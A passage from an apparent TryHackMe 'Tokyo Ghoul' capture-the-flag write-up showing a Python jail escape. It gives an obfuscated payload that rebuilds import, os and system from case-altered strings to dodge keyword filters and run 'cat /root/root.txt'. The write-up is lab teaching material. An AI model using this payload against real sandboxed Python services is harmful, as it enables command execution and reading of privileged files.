chaudhary1337/chaudhary1337.github.io/TryHackMe/TokyoGhoul.md

 NameError: name 'hi' is not defined
 ```

+Uh okay, so cheap trick, let's see if sneaking in works.
 ```
 >>> "cat root/root.txt"
 No Kaneki you are so dead
 ```

+Apparently not.
+What we need to do is import os and spawn a shell, or, just cat the `root/root.txt` file.
+But, for that, we need to somehow make python execute shell code.
+How?
+Python has a built in function `exec()` that does just that.
+So, all we need to do is **python3 jail-break**.
+[Look up here for more information](https://anee.me/escaping-python-jails-849c65cf306e).

 ```
 __builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('cat /root/root.txt')
 ```

 And we are done!